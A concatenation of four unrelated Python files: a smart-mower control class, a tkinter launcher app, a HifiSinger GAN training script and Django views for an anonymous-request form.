"attributes": {"command": "START_DONT_OVERRIDE", "seconds": duration},
}
self.smart_system.call_smart_system_service(self.mower_id, data)
else:
self.smart_system.logger.error("The mower id is not defined")
def park_until_next_task(self):
if self.mower_id is not None:
data = {
"id": str(uuid.uuid1()),
"type": "MOWER_CONTROL",
"attributes": {"command": "PARK_UNTIL_NEXT_TASK"},
}
self.smart_system.call_smart_system_service(self.mower_id, data)
else:
self.smart_system.logger.error("The mower id is not defined")
def park_until_further_notice(self):
if self.mower_id is not None:
data = {
"id": str(uuid.uuid1()),
"type": "MOWER_CONTROL",
"attributes": {"command": "PARK_UNTIL_FURTHER_NOTICE"},
}
self.smart_system.call_smart_system_service(self.mower_id, data)
else:
self.smart_system.logger.error("The mower id is not defined")
|
import tkinter as tk
class app(tk.Frame):
def __init__(self, i, master=None):
super().__init__(master)
self.master = master
self.i = i
self.i_2 = i
self.i_3 = i
self.pack()
self.createWidgets()
def createWidgets(self):
self.btnFrame = tk.Frame(self)
self.btnpaint = tk.Button(self.btnFrame, text='Paint', command = self.paint)
self.btnpaint_2 = tk.Button(self.btnFrame, text= 'Paint v2', command = self.paint_2)
self.btnhome = tk.Button(self.btnFrame, text='Home stuff', command=self.home)
self.btntextedit = tk.Button(self.btnFrame, text='text editer', command=self.text_edit)
self.btnclose = tk.Button(self.btnFrame, text='close', command=self.master.destroy())
self.btns = [self.btnpaint, self.btnpaint_2, self.btnhome, self.btntextedit, self.btnclose]
self.btnFrame.grid(row = 0, column=0, sticky='ns')
i = 0
for item in self.btns:
item.grid(row=i, column = 0, sticky='ew')
i += 1
def paint(self):
import Class_one
if self.i != 0:
Class_one.draw()
self.i += 1
def paint_2(self):
import class_2
if self.i_2 != 0:
class_2.paint()
self.i_2 += 1
def home(self):
import class_3_homework as class_3
if self.i_3 != 0:
class_3.extra()
self.i_3 += 1
def text_edit(self):
import Class_4 as class_4
self.df_save_loc = '/home/jonah/Thonny files/TXT_files/' # change to folder name where you want auto saves as def
self.df_name = 'testing' # you can chnage def save name
self.root_2 = tk.Tk()
self.root_2.title('Text Editer')
self.root_2.rowconfigure(0, minsize =800, weight = 1)
self.root_2.columnconfigure(1, minsize =600, weight=1)
self.app_2 = class_4.Application(df_name, df_save_loc, master=root_2)
self.app_2.mainloop()
root = tk.Tk()
i = 0
root.rowconfigure(0, minsize =9999, weight = 1)
root.columnconfigure(1, minsize =9999, weight=1)
app = app(i, master=root)
app.mainloop() |
import os
os.environ['FOR_DISABLE_CONSOLE_CTRL_HANDLER'] = 'T' # This is ot prevent to be called Fortran Ctrl+C crash in Windows.
import torch
import numpy as np
import logging, yaml, sys, argparse, math
from tqdm import tqdm
from collections import defaultdict
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
from scipy.io import wavfile
from Modules import HifiSinger, Discriminators, Gradient_Penalty
from Datasets import Dataset, Inference_Dataset, Collater, Inference_Collater
from Radam import RAdam
from Noam_Scheduler import Modified_Noam_Scheduler
from Logger import Logger
from distributed import init_distributed, apply_gradient_allreduce, reduce_tensor
from Arg_Parser import Recursive_Parse
logging.basicConfig(
level=logging.INFO, stream=sys.stdout,
format= '%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s'
)
class Trainer:
def __init__(self, hp_path, steps= 0):
self.hp_Path = hp_path
self.gpu_id = int(os.getenv('RANK', '0'))
self.num_gpus = int(os.getenv("WORLD_SIZE", '1'))
self.hp = Recursive_Parse(yaml.load(
open(self.hp_Path, encoding='utf-8'),
Loader=yaml.Loader
))
if not torch.cuda.is_available():
self.device = torch.device('cpu')
else:
self.device = torch.device('cuda:{}'.format(self.gpu_id))
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
torch.cuda.set_device(0)
self.steps = steps
self.Datset_Generate()
self.Model_Generate()
self.Load_Checkpoint()
self._Set_Distribution()
self.scalar_Dict = {
'Train': defaultdict(float),
'Evaluation': defaultdict(float),
}
self.writer_Dict = {
'Train': Logger(os.path.join(self.hp.Log_Path, 'Train')),
'Evaluation': Logger(os.path.join(self.hp.Log_Path, 'Evaluation')),
}
def Datset_Generate(self):
token_Dict = yaml.load(open(self.hp.Token_Path), Loader=yaml.Loader)
train_Dataset = Dataset(
pattern_path= self.hp.Train.Train_Pattern.Path,
Metadata_file= self.hp.Train.Train_Pattern.Metadata_File,
token_dict= token_Dict,
accumulated_dataset_epoch= self.hp.Train.Train_Pattern.Accumulated_Dataset_Epoch,
use_cache = self.hp.Train.Use_Pattern_Cache
)
eval_Dataset = Dataset(
pattern_path= self.hp.Train.Eval_Pattern.Path,
Metadata_file= self.hp.Train.Eval_Pattern.Metadata_File,
token_dict= token_Dict,
use_cache = self.hp.Train.Use_Pattern_Cache
)
inference_Dataset = Inference_Dataset(
token_dict= token_Dict,
pattern_paths= ['./Inference_for_Training/Example.txt', './Inference_for_Training/Example2.txt'],
use_cache= False
)
if self.gpu_id == 0:
logging.info('The number of train patterns = {}.'.format(train_Dataset.base_Length))
logging.info('The number of development patterns = {}.'.format(eval_Dataset.base_Length))
logging.info('The number of inference patterns = {}.'.format(len(inference_Dataset)))
collater = Collater(
token_dict= token_Dict,
max_abs_mel= self.hp.Sound.Max_Abs_Mel
)
inference_Collater = Inference_Collater(
token_dict= token_Dict,
max_abs_mel= self.hp.Sound.Max_Abs_Mel
)
self.dataLoader_Dict = {}
self.dataLoader_Dict['Train'] = torch.utils.data.DataLoader(
dataset= train_Dataset,
sampler= torch.utils.data.DistributedSampler(train_Dataset, shuffle= True) \
if self.hp.Use_Multi_GPU else \
torch.utils.data.RandomSampler(train_Dataset),
collate_fn= collater,
batch_size= self.hp.Train.Batch_Size,
num_workers= self.hp.Train.Num_Workers,
pin_memory= True
)
self.dataLoader_Dict['Eval'] = torch.utils.data.DataLoader(
dataset= eval_Dataset,
sampler= torch.utils.data.RandomSampler(eval_Dataset),
collate_fn= collater,
batch_size= self.hp.Train.Batch_Size,
num_workers= self.hp.Train.Num_Workers,
pin_memory= True
)
self.dataLoader_Dict['Inference'] = torch.utils.data.DataLoader(
dataset= inference_Dataset,
sampler= torch.utils.data.SequentialSampler(inference_Dataset),
collate_fn= inference_Collater,
batch_size= self.hp.Inference_Batch_Size or self.hp.Train.Batch_Size,
num_workers= self.hp.Train.Num_Workers,
pin_memory= True
)
def Model_Generate(self):
self.model_Dict = {
'Generator': HifiSinger(self.hp).to(self.device),
'Discriminator': Discriminators(self.hp).to(self.device)
}
self.model_Dict['Generator'].requires_grad_(False)
self.model_Dict['Discriminator'].requires_grad_(False)
self.criterion_Dict = {
'Mean_Absolute_Error': torch.nn.L1Loss(reduction= 'none').to(self.device),
'Gradient_Penalty': Gradient_Penalty(
gamma= self.hp.Train.Discriminator_Gradient_Panelty_Gamma
).to(self.device),
}
self.optimizer_Dict = {
'Generator': RAdam(
params= self.model_Dict['Generator'].parameters(),
lr= self.hp.Train.Learning_Rate.Generator.Initial,
betas=(self.hp.Train.ADAM.Beta1, self.hp.Train.ADAM.Beta2),
eps= self.hp.Train.ADAM.Epsilon,
weight_decay= self.hp.Train.Weight_Decay
),
'Discriminator': RAdam(
params= self.model_Dict['Discriminator'].parameters(),
lr= self.hp.Train.Learning_Rate.Discriminator.Initial,
betas=(self.hp.Train.ADAM.Beta1, self.hp.Train.ADAM.Beta2),
eps= self.hp.Train.ADAM.Epsilon,
weight_decay= self.hp.Train.Weight_Decay
)
}
self.scheduler_Dict = {
'Generator': Modified_Noam_Scheduler(
optimizer= self.optimizer_Dict['Generator'],
base= self.hp.Train.Learning_Rate.Generator.Base
),
'Discriminator': Modified_Noam_Scheduler(
optimizer= self.optimizer_Dict['Discriminator'],
base= self.hp.Train.Learning_Rate.Discriminator.Base
)
}
self.scaler = torch.cuda.amp.GradScaler(enabled= self.hp.Use_Mixed_Precision)
self.vocoder = None
if not self.hp.Vocoder_Path is None:
self.vocoder = torch.jit.load(self.hp.Vocoder_Path).to(self.device)
if self.gpu_id == 0:
logging.info('#' * 100)
logging.info('Generator structure')
logging.info(self.model_Dict['Generator'])
logging.info('#' * 100)
logging.info('Discriminator structure')
logging.info(self.model_Dict['Discriminator'])
def Train_Step(self, durations, tokens, notes, token_lengths, mels, silences, pitches, mel_lengths):
loss_Dict = {}
durations = durations.to(self.device, non_blocking=True)
tokens = tokens.to(self.device, non_blocking=True)
notes = notes.to(self.device, non_blocking=True)
token_lengths = token_lengths.to(self.device, non_blocking=True)
mels = mels.to(self.device, non_blocking=True)
silences = silences.to(self.device, non_blocking=True)
pitches = pitches.to(self.device, non_blocking=True)
mel_lengths = mel_lengths.to(self.device, non_blocking=True)
with torch.cuda.amp.autocast(enabled= self.hp.Use_Mixed_Precision):
# Generator loss
self.optimizer_Dict['Generator'].zero_grad()
self.model_Dict['Generator'].requires_grad_(True)
predicted_Mels, predicted_Silences, predicted_Pitches, predicted_Durations = self.model_Dict['Generator'](
durations= durations,
tokens= tokens,
notes= notes,
token_lengths= token_lengths
)
discriminations = self.model_Dict['Discriminator'](predicted_Mels, mel_lengths)
loss_Dict['Mel'] = self.criterion_Dict['Mean_Absolute_Error'](predicted_Mels, mels)
loss_Dict['Mel'] = loss_Dict['Mel'].sum(dim= 2).mean(dim=1) / mel_lengths.float()
loss_Dict['Mel'] = loss_Dict['Mel'].mean()
loss_Dict['Silence'] = self.criterion_Dict['Mean_Absolute_Error'](predicted_Silences, silences) # BCE is faster, but loss increase infinity because the silence cannot tracking perfectly.
loss_Dict['Silence'] = loss_Dict['Silence'].sum(dim= 1) / mel_lengths.float()
loss_Dict['Silence'] = loss_Dict['Silence'].mean()
loss_Dict['Pitch'] = self.criterion_Dict['Mean_Absolute_Error'](predicted_Pitches, pitches)
loss_Dict['Pitch'] = loss_Dict['Pitch'].sum(dim= 1) / mel_lengths.float()
loss_Dict['Pitch'] = loss_Dict['Pitch'].mean()
loss_Dict['Predicted_Duration'] = self.criterion_Dict['Mean_Absolute_Error'](predicted_Durations, durations.float()).mean()
loss_Dict['Adversarial'] = torch.stack([torch.nn.functional.softplus(-x).mean() for x in discriminations]).sum()
loss_Dict['Generator'] = loss_Dict['Mel'] + loss_Dict['Silence'] + loss_Dict['Pitch'] + loss_Dict['Predicted_Duration'] + loss_Dict['Adversarial']
self.scaler.scale(loss_Dict['Generator']).backward()
if self.hp.Train.Gradient_Norm > 0.0:
self.scaler.unscale_(self.optimizer_Dict['Generator'])
torch.nn.utils.clip_grad_norm_(
parameters= self.model_Dict['Generator'].parameters(),
max_norm= self.hp.Train.Gradient_Norm
)
self.model_Dict['Generator'].requires_grad_(False)
self.scaler.step(self.optimizer_Dict['Generator'])
self.scaler.update()
self.scheduler_Dict['Generator'].step()
with torch.cuda.amp.autocast(enabled= self.hp.Use_Mixed_Precision):
# Fake discrimination
self.optimizer_Dict['Discriminator'].zero_grad()
self.model_Dict['Discriminator'].requires_grad_(True)
fakes, *_ = self.model_Dict['Generator'](
durations= durations,
tokens= tokens,
notes= notes,
token_lengths= token_lengths
)
discriminations = self.model_Dict['Discriminator'](fakes, mel_lengths)
loss_Dict['Fake'] = torch.stack([torch.nn.functional.softplus(x).mean() for x in discriminations]).sum()
self.scaler.scale(loss_Dict['Fake']).backward()
if self.hp.Train.Gradient_Norm > 0.0:
self.scaler.unscale_(self.optimizer_Dict['Discriminator'])
torch.nn.utils.clip_grad_norm_(
parameters= self.model_Dict['Discriminator'].parameters(),
max_norm= self.hp.Train.Gradient_Norm
)
self.model_Dict['Discriminator'].requires_grad_(False)
self.scaler.step(self.optimizer_Dict['Discriminator'])
self.scaler.update()
self.scheduler_Dict['Discriminator'].step()
with torch.cuda.amp.autocast(enabled= self.hp.Use_Mixed_Precision):
# Real discrimination
self.optimizer_Dict['Discriminator'].zero_grad()
self.model_Dict['Discriminator'].requires_grad_(True)
discriminations = self.model_Dict['Discriminator'](mels, mel_lengths)
loss_Dict['Real'] = torch.stack([torch.nn.functional.softplus(-x).mean() for x in discriminations]).sum()
self.scaler.scale(loss_Dict['Real']).backward()
if self.hp.Train.Gradient_Norm > 0.0:
self.scaler.unscale_(self.optimizer_Dict['Discriminator'])
torch.nn.utils.clip_grad_norm_(
parameters= self.model_Dict['Discriminator'].parameters(),
max_norm= self.hp.Train.Gradient_Norm
)
self.model_Dict['Discriminator'].requires_grad_(False)
self.scaler.step(self.optimizer_Dict['Discriminator'])
self.scaler.update()
self.scheduler_Dict['Discriminator'].step()
with torch.cuda.amp.autocast(enabled= self.hp.Use_Mixed_Precision):
# Gradient penalty
reals_for_GP = mels.detach().requires_grad_(True) # This is required to calculate the gradient penalties.
self.optimizer_Dict['Discriminator'].zero_grad()
self.model_Dict['Discriminator'].requires_grad_(True)
discriminations = self.model_Dict['Discriminator'](reals_for_GP, mel_lengths)
loss_Dict['Gradient_Penalty'] = self.criterion_Dict['Gradient_Penalty'](
reals= reals_for_GP,
discriminations= torch.stack(discriminations, dim= -1).sum(dim= (1,2,3))
)
self.scaler.scale(loss_Dict['Gradient_Penalty']).backward()
if self.hp.Train.Gradient_Norm > 0.0:
self.scaler.unscale_(self.optimizer_Dict['Discriminator'])
torch.nn.utils.clip_grad_norm_(
parameters= self.model_Dict['Discriminator'].parameters(),
max_norm= self.hp.Train.Gradient_Norm
)
self.model_Dict['Discriminator'].requires_grad_(False)
self.scaler.step(self.optimizer_Dict['Discriminator'])
self.scaler.update()
self.scheduler_Dict['Discriminator'].step()
self.steps += 1
self.tqdm.update(1)
for tag, loss in loss_Dict.items():
loss = reduce_tensor(loss.data, self.num_gpus).item() if self.num_gpus > 1 else loss.item()
self.scalar_Dict['Train']['Loss/{}'.format(tag)] += loss
def Train_Epoch(self):
for durations, tokens, notes, token_lengths, mels, silences, pitches, mel_lengths in self.dataLoader_Dict['Train']:
self.Train_Step(durations, tokens, notes, token_lengths, mels, silences, pitches, mel_lengths)
if self.steps % self.hp.Train.Checkpoint_Save_Interval == 0:
self.Save_Checkpoint()
if self.steps % self.hp.Train.Logging_Interval == 0:
self.scalar_Dict['Train'] = {
tag: loss / self.hp.Train.Logging_Interval
for tag, loss in self.scalar_Dict['Train'].items()
}
self.scalar_Dict['Train']['Learning_Rate/Generator'] = self.scheduler_Dict['Generator'].get_last_lr()
self.scalar_Dict['Train']['Learning_Rate/Discriminator'] = self.scheduler_Dict['Discriminator'].get_last_lr()
self.writer_Dict['Train'].add_scalar_dict(self.scalar_Dict['Train'], self.steps)
self.scalar_Dict['Train'] = defaultdict(float)
if self.steps % self.hp.Train.Evaluation_Interval == 0:
self.Evaluation_Epoch()
if self.steps % self.hp.Train.Inference_Interval == 0:
self.Inference_Epoch()
if self.steps >= self.hp.Train.Max_Step:
return
# @torch.no_grad() Gradient needs to calculate gradient penalty losses.
def Evaluation_Step(self, durations, tokens, notes, token_lengths, mels, silences, pitches, mel_lengths):
loss_Dict = {}
durations = durations.to(self.device, non_blocking=True)
tokens = tokens.to(self.device, non_blocking=True)
notes = notes.to(self.device, non_blocking=True)
token_lengths = token_lengths.to(self.device, non_blocking=True)
mels = mels.to(self.device, non_blocking=True)
silences = silences.to(self.device, non_blocking=True)
pitches = pitches.to(self.device, non_blocking=True)
mel_lengths = mel_lengths.to(self.device, non_blocking=True)
# Generator loss
predicted_Mels, predicted_Silences, predicted_Pitches, predicted_Durations = self.model_Dict['Generator'](
durations= durations,
tokens= tokens,
notes= notes,
token_lengths= token_lengths
)
discriminations = self.model_Dict['Discriminator'](predicted_Mels, mel_lengths)
loss_Dict['Mel'] = self.criterion_Dict['Mean_Absolute_Error'](predicted_Mels, mels)
loss_Dict['Mel'] = loss_Dict['Mel'].sum(dim= 2).mean(dim=1) / mel_lengths.float()
loss_Dict['Mel'] = loss_Dict['Mel'].mean()
loss_Dict['Silence'] = self.criterion_Dict['Mean_Absolute_Error'](predicted_Silences, silences) # BCE is faster, but loss increase infinity because the silence cannot tracking perfectly.
loss_Dict['Silence'] = loss_Dict['Silence'].sum(dim= 1) / mel_lengths.float()
loss_Dict['Silence'] = loss_Dict['Silence'].mean()
loss_Dict['Pitch'] = self.criterion_Dict['Mean_Absolute_Error'](predicted_Pitches, pitches)
loss_Dict['Pitch'] = loss_Dict['Pitch'].sum(dim= 1) / mel_lengths.float()
loss_Dict['Pitch'] = loss_Dict['Pitch'].mean()
loss_Dict['Predicted_Duration'] = self.criterion_Dict['Mean_Absolute_Error'](predicted_Durations, durations.float()).mean()
loss_Dict['Adversarial'] = torch.stack([torch.nn.functional.softplus(-x).mean() for x in discriminations]).sum()
loss_Dict['Generator'] = loss_Dict['Mel'] + loss_Dict['Silence'] + loss_Dict['Pitch'] + loss_Dict['Predicted_Duration'] + loss_Dict['Adversarial']
# Fake discrimination
fakes, *_ = self.model_Dict['Generator'](
durations= durations,
tokens= tokens,
notes= notes,
token_lengths= token_lengths
)
discriminations = self.model_Dict['Discriminator'](fakes, mel_lengths)
loss_Dict['Fake'] = torch.stack([torch.nn.functional.softplus(x).mean() for x in discriminations]).sum()
# Real discrimination
discriminations = self.model_Dict['Discriminator'](mels, mel_lengths)
loss_Dict['Real'] = torch.stack([torch.nn.functional.softplus(-x).mean() for x in discriminations]).sum()
# Gradient penalty
reals_for_GP = mels.detach().requires_grad_(True) # This is required to calculate the gradient penalties.
self.optimizer_Dict['Discriminator'].zero_grad()
self.model_Dict['Discriminator'].requires_grad_(True)
discriminations = self.model_Dict['Discriminator'](reals_for_GP, mel_lengths)
loss_Dict['Gradient_Penalty'] = self.criterion_Dict['Gradient_Penalty'](
reals= reals_for_GP,
discriminations= torch.stack(discriminations, dim= -1).sum(dim= (1,2,3))
)
self.model_Dict['Discriminator'].requires_grad_(False)
self.optimizer_Dict['Discriminator'].zero_grad()
for tag, loss in loss_Dict.items():
loss = reduce_tensor(loss.data, self.num_gpus).item() if self.num_gpus > 1 else loss.item()
self.scalar_Dict['Evaluation']['Loss/{}'.format(tag)] += loss
return predicted_Mels, predicted_Silences, predicted_Pitches, predicted_Durations
def Evaluation_Epoch(self):
if self.gpu_id != 0:
return
logging.info('(Steps: {}) Start evaluation in GPU {}.'.format(self.steps, self.gpu_id))
self.model_Dict['Generator'].eval()
self.model_Dict['Discriminator'].eval()
for step, (durations, tokens, notes, token_lengths, mels, silences, pitches, mel_lengths) in tqdm(
enumerate(self.dataLoader_Dict['Eval'], 1),
desc='[Evaluation]',
total= math.ceil(len(self.dataLoader_Dict['Eval'].dataset) / self.hp.Train.Batch_Size)
):
predicted_Mels, predicted_Silences, predicted_Pitches, predicted_Durations = self.Evaluation_Step(durations, tokens, notes, token_lengths, mels, silences, pitches, mel_lengths)
self.scalar_Dict['Evaluation'] = {
tag: loss / step
for tag, loss in self.scalar_Dict['Evaluation'].items()
}
self.writer_Dict['Evaluation'].add_scalar_dict(self.scalar_Dict['Evaluation'], self.steps)
self.writer_Dict['Evaluation'].add_histogram_model(self.model_Dict['Generator'], 'Generator', self.steps, delete_keywords=['layer_Dict', 'layer'])
self.writer_Dict['Evaluation'].add_histogram_model(self.model_Dict['Discriminator'], 'Discriminator', self.steps, delete_keywords=['layer_Dict', 'layer'])
self.scalar_Dict['Evaluation'] = defaultdict(float)
duration = durations[-1]
duration = torch.arange(duration.size(0)).repeat_interleave(duration.cpu()).numpy()
predicted_Duration = predicted_Durations[-1].ceil().long().clamp(0, self.hp.Max_Duration)
predicted_Duration = torch.arange(predicted_Duration.size(0)).repeat_interleave(predicted_Duration.cpu()).numpy()
image_Dict = {
'Mel/Target': (mels[-1, :, :mel_lengths[-1]].cpu().numpy(), None),
'Mel/Prediction': (predicted_Mels[-1, :, :mel_lengths[-1]].cpu().numpy(), None),
'Silence/Target': (silences[-1, :mel_lengths[-1]].cpu().numpy(), None),
'Silence/Prediction': (predicted_Silences[-1, :mel_lengths[-1]].cpu().numpy(), None),
'Pitch/Target': (pitches[-1, :mel_lengths[-1]].cpu().numpy(), None),
'Pitch/Prediction': (predicted_Pitches[-1, :mel_lengths[-1]].cpu().numpy(), None),
'Duration/Target': (duration, None),
'Duration/Prediction': (predicted_Duration, None),
}
self.writer_Dict['Evaluation'].add_image_dict(image_Dict, self.steps)
self.model_Dict['Generator'].train()
self.model_Dict['Discriminator'].train()
@torch.no_grad()
def Inference_Step(self, durations, tokens, notes, token_lengths, labels, start_index= 0, tag_step= False):
durations = durations.to(self.device, non_blocking=True)
tokens = tokens.to(self.device, non_blocking=True)
notes = notes.to(self.device, non_blocking=True)
token_lengths = token_lengths.to(self.device, non_blocking=True)
predicted_Mels, predicted_Silences, predicted_Pitches, predicted_Durations = self.model_Dict['Generator'](
durations= durations,
tokens= tokens,
notes= notes,
token_lengths = token_lengths
)
files = []
for index, label in enumerate(labels):
tags = []
if tag_step: tags.append('Step-{}'.format(self.steps))
tags.append(label)
tags.append('IDX_{}'.format(index + start_index))
files.append('.'.join(tags))
os.makedirs(os.path.join(self.hp.Inference_Path, 'Step-{}'.format(self.steps), 'PNG').replace('\\', '/'), exist_ok= True)
os.makedirs(os.path.join(self.hp.Inference_Path, 'Step-{}'.format(self.steps), 'NPY', 'Mel').replace('\\', '/'), exist_ok= True)
for mel, silence, pitch, duration, label, file in zip(
predicted_Mels.cpu(),
predicted_Silences.cpu(),
predicted_Pitches.cpu(),
predicted_Durations.cpu(),
labels,
files
):
title = 'Note infomation: {}'.format(label)
new_Figure = plt.figure(figsize=(20, 5 * 4), dpi=100)
plt.subplot2grid((4, 1), (0, 0))
plt.imshow(mel, aspect='auto', origin='lower')
plt.title('Mel {}'.format(title))
plt.colorbar()
plt.subplot2grid((4, 1), (1, 0))
plt.plot(silence)
plt.margins(x= 0)
plt.title('Silence {}'.format(title))
plt.colorbar()
plt.subplot2grid((4, 1), (2, 0))
plt.plot(pitch)
plt.margins(x= 0)
plt.title('Pitch {}'.format(title))
plt.colorbar()
duration = duration.ceil().long().clamp(0, self.hp.Max_Duration)
duration = torch.arange(duration.size(0)).repeat_interleave(duration)
plt.subplot2grid((4, 1), (3, 0))
plt.plot(duration)
plt.margins(x= 0)
plt.title('Duration {}'.format(title))
plt.colorbar()
plt.tight_layout()
plt.savefig(os.path.join(self.hp.Inference_Path, 'Step-{}'.format(self.steps), 'PNG', '{}.png'.format(file)).replace('\\', '/'))
plt.close(new_Figure)
np.save(
os.path.join(self.hp.Inference_Path, 'Step-{}'.format(self.steps), 'NPY', 'Mel', file).replace('\\', '/'),
mel.T,
allow_pickle= False
)
# This part may be changed depending on the vocoder used.
if not self.vocoder is None:
os.makedirs(os.path.join(self.hp.Inference_Path, 'Step-{}'.format(self.steps), 'Wav').replace('\\', '/'), exist_ok= True)
for mel, silence, pitch, file in zip(predicted_Mels, predicted_Silences, predicted_Pitches, files):
mel = mel.unsqueeze(0)
silence = silence.unsqueeze(0)
pitch = pitch.unsqueeze(0)
x = torch.randn(size=(mel.size(0), self.hp.Sound.Frame_Shift * mel.size(2))).to(mel.device)
mel = torch.nn.functional.pad(mel, (2,2), 'reflect')
silence = torch.nn.functional.pad(silence.unsqueeze(dim= 1), (2,2), 'reflect').squeeze(dim= 1)
pitch = torch.nn.functional.pad(pitch.unsqueeze(dim= 1), (2,2), 'reflect').squeeze(dim= 1)
wav = self.vocoder(x, mel, silence, pitch).cpu().numpy()[0]
wavfile.write(
filename= os.path.join(self.hp.Inference_Path, 'Step-{}'.format(self.steps), 'Wav', '{}.wav'.format(file)).replace('\\', '/'),
data= (np.clip(wav, -1.0 + 1e-7, 1.0 - 1e-7) * 32767.5).astype(np.int16),
rate= self.hp.Sound.Sample_Rate
)
def Inference_Epoch(self):
if self.gpu_id != 0:
return
logging.info('(Steps: {}) Start inference in GPU {}.'.format(self.steps, self.gpu_id))
self.model_Dict['Generator'].eval()
for step, (durations, tokens, notes, token_lengths, labels) in tqdm(
enumerate(self.dataLoader_Dict['Inference']),
desc='[Inference]',
total= math.ceil(len(self.dataLoader_Dict['Inference'].dataset) / (self.hp.Inference_Batch_Size or self.hp.Train.Batch_Size))
):
self.Inference_Step(durations, tokens, notes, token_lengths, labels, start_index= step * (self.hp.Inference_Batch_Size or self.hp.Train.Batch_Size))
self.model_Dict['Generator'].train()
def Load_Checkpoint(self):
if self.steps == 0:
paths = [
os.path.join(root, file).replace('\\', '/')
for root, _, files in os.walk(self.hp.Checkpoint_Path)
for file in files
if os.path.splitext(file)[1] == '.pt'
]
if len(paths) > 0:
path = max(paths, key = os.path.getctime)
else:
return # Initial training
else:
path = os.path.join(self.hp.Checkpoint_Path, 'S_{}.pt'.format(self.steps).replace('\\', '/'))
state_Dict = torch.load(path, map_location= 'cpu')
self.model_Dict['Generator'].load_state_dict(state_Dict['Generator']['Model'])
self.model_Dict['Discriminator'].load_state_dict(state_Dict['Discriminator']['Model'])
self.optimizer_Dict['Generator'].load_state_dict(state_Dict['Generator']['Optimizer'])
self.optimizer_Dict['Discriminator'].load_state_dict(state_Dict['Discriminator']['Optimizer'])
self.scheduler_Dict['Generator'].load_state_dict(state_Dict['Generator']['Scheduler'])
self.scheduler_Dict['Discriminator'].load_state_dict(state_Dict['Discriminator']['Scheduler'])
self.steps = state_Dict['Steps']
logging.info('Checkpoint loaded at {} steps in GPU {}.'.format(self.steps, self.gpu_id))
def Save_Checkpoint(self):
if self.gpu_id != 0:
return
os.makedirs(self.hp.Checkpoint_Path, exist_ok= True)
state_Dict = {
'Generator': {
'Model': self.model_Dict['Generator'].module.state_dict() if self.hp.Use_Multi_GPU else self.model_Dict['Generator'].state_dict(),
'Optimizer': self.optimizer_Dict['Generator'].state_dict(),
'Scheduler': self.scheduler_Dict['Generator'].state_dict(),
},
'Discriminator': {
'Model': self.model_Dict['Discriminator'].module.state_dict() if self.hp.Use_Multi_GPU else self.model_Dict['Discriminator'].state_dict(),
'Optimizer': self.optimizer_Dict['Discriminator'].state_dict(),
'Scheduler': self.scheduler_Dict['Discriminator'].state_dict(),
},
'Steps': self.steps
}
torch.save(
state_Dict,
os.path.join(self.hp.Checkpoint_Path, 'S_{}.pt'.format(self.steps).replace('\\', '/'))
)
logging.info('Checkpoint saved at {} steps.'.format(self.steps))
def _Set_Distribution(self):
if self.num_gpus > 1:
self.model = apply_gradient_allreduce(self.model)
def Train(self):
hp_Path = os.path.join(self.hp.Checkpoint_Path, 'Hyper_Parameters.yaml').replace('\\', '/')
if not os.path.exists(hp_Path):
from shutil import copyfile
os.makedirs(self.hp.Checkpoint_Path, exist_ok= True)
copyfile(self.hp_Path, hp_Path)
if self.steps == 0:
self.Evaluation_Epoch()
if self.hp.Train.Initial_Inference:
self.Inference_Epoch()
self.tqdm = tqdm(
initial= self.steps,
total= self.hp.Train.Max_Step,
desc='[Training]'
)
while self.steps < self.hp.Train.Max_Step:
try:
self.Train_Epoch()
except KeyboardInterrupt:
self.Save_Checkpoint()
exit(1)
self.tqdm.close()
logging.info('Finished training.')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-hp', '--hyper_parameters', required= True, type= str)
parser.add_argument('-s', '--steps', default= 0, type= int)
parser.add_argument('-p', '--port', default= 54321, type= int)
parser.add_argument('-r', '--local_rank', default= 0, type= int)
args = parser.parse_args()
hp = Recursive_Parse(yaml.load(
open(args.hyper_parameters, encoding='utf-8'),
Loader=yaml.Loader
))
os.environ['CUDA_VISIBLE_DEVICES'] = hp.Device
if hp.Use_Multi_GPU:
init_distributed(
rank= int(os.getenv('RANK', '0')),
num_gpus= int(os.getenv("WORLD_SIZE", '1')),
dist_backend= 'nccl',
dist_url= 'tcp://127.0.0.1:{}'.format(args.port)
)
else:
new_Trainer = Trainer(hp_path= args.hyper_parameters, steps= args.steps)
new_Trainer.Train() |
from datetime import time
from django.contrib.auth import get_user_model
from dlcf_anonymous_request.users.models import AnonymousMessage
from dlcf_anonymous_request.users.forms import RequestCreateForm
from django.shortcuts import render
# from django.urls import reverse
from django.forms.models import BaseModelForm
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.messages.views import SuccessMessageMixin
from django.urls import reverse, reverse_lazy
from django.utils.translation import gettext_lazy as _
from django.views.generic import DetailView, RedirectView, UpdateView, CreateView
from django.http import HttpResponse, HttpResponseRedirect
User = get_user_model()
class UserDetailView(LoginRequiredMixin, DetailView):
model = User
slug_field = "username"
slug_url_kwarg = "username"
user_detail_view = UserDetailView.as_view()
class UserUpdateView(LoginRequiredMixin, SuccessMessageMixin, UpdateView):
model = User
fields = ["name"]
success_message = _("Information successfully updated")
def get_success_url(self):
return self.request.user.get_absolute_url() # type: ignore [union-attr]
def get_object(self):
return self.request.user
user_update_view = UserUpdateView.as_view()
class UserRedirectView(LoginRequiredMixin, RedirectView):
permanent = False
def get_redirect_url(self):
return reverse("users:detail", kwargs={"username": self.request.user.username})
user_redirect_view = UserRedirectView.as_view()
class RequestCreateView(CreateView):
def get(self, request, *args, **kwargs):
context = {'form': RequestCreateForm()}
return render(request, 'pages/home.html', context)
def post(self, request, *args, **kwargs):
form = RequestCreateForm(request.POST)
if form.is_valid():
book = form.save()
book.save()
return HttpResponseRedirect(reverse_lazy('request_form_sub_success'))
return render(request, 'pages/home.html', {'form': form})
# class RequestCreateView(CreateView):
# model = AnonymousMessage
# # form_class = RequestCreateForm
# template_name = "pages/home.html"
# fields = ['request']
# def form_valid(self, form: BaseModelForm) -> HttpResponse:
# request_form = form.save()
# response = HttpResponse()
# # response["HX-Trigger"] = json.dumps(
# # {"redirect": {"url": request_form_sub_success}}
# # )
# return response
request_create_view = RequestCreateView.as_view()
# def request_create_view(request, pk):
# # author = Author.objects.get(id=pk)
# model = AnonymousMessage
# # books = Book.objects.filter(author=author)
# # form = BookForm(request.POST or None)
# form = RequestCreateForm
# if request.method == "POST":
# if form.is_valid():
# form.save()
# # book.author = author
# # book.save()
# return redirect("success")
# else:
# return render(request, "pages/home.html", context={
# "form": form
# })
# context = {
